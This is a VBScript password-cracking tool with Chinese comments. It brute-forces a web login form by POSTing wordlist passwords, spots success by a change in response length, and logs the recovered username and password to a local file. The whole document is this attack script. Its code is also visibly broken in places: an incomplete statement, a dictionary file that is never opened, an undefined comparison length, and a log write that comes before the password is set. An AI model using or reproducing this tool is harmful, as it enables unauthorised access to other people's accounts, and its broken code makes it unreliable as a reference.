set outstreem=wscript.stdout

set instreem=wscript.stdin

set http=createobject("Microsoft.XMLHTTP")

set fso=createobject("scripting.filesystemobject")

set shell=createobject("wscript.shell")



if lcase(right(wscript.fullname,11))="wscript.exe" then

shell.run("cmd.exe /k echo off&cls&cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))

wscript.quit

end if       '这里的目的是用cscript.exe来执行脚本



wscript.echo string(79,"*")

wscript.echo "%C4%E3"

wscript.echo "   by 千寂孤城   E-mail:love_smj@sina.com"

wscript.echo ""

wscript.echo string(79,"*")

wscript.echo "若要破解的用户名是汉字，请使用IE将其转换为16进制！！"



outstreem.write "登陆页面的路径是："   

webpath=instreem.readline       '取得"http://xxxxx/login.asp"一类的登陆路径



outstreem.write "要破解的用户名："

name=instreem.readline       '这里注意，用户名如果是汉字必须用ie转换成16进制。比如说如果用户名是“一二”，就要输入：%B0%A1%B0%A1



outstreem.write name&

xname=instreem.readline



set result=fso.opentextfile("c:\result.log",8,true)

result.writeline "user:"&name&"   pass:"&pwd

result.close



outstreem.write "表单中用于输入用户名的文本框名字："   

bdname=instreem.readline



outstreem.write "表单中用于输入密码的密码框名字："   

bdpass=instreem.readline



outstreem.write "字典在哪里："

path=instreem.readline       '没有字典的话直接按回车，程序会自己生成字典。



















do   '开始破解

if zidian.atendofstream=true then

wscript.echo "Sorry,the pwd is beyond "&path&"."

wscript.quit

end if

pwd=zidian.readline

http.open "POST",webpath,false

http.setrequestheader "Content-Type","application/x-www-form-urlencoded"

http.send bdname& "=" &name& "&" &bdpass& "=" &pwd

if len(Http.responsebody)<falselen-50 or len(Http.responsebody)>falselen+50 then

exit do

end if

'如果返回的数据长度和falselen相差太大就说明密码正确了。

wscript.echo "trying:"&pwd

loop

zidian.close

wscript.echo "Good Luck!!"

wscript.echo "password is "&pwd

wscript.echo "the log file is 'c:\result.log'"

set result=fso.opentextfile("c:\result.log",8,true)

result.writeline "user:"&name&"   pass:"&pwd

result.close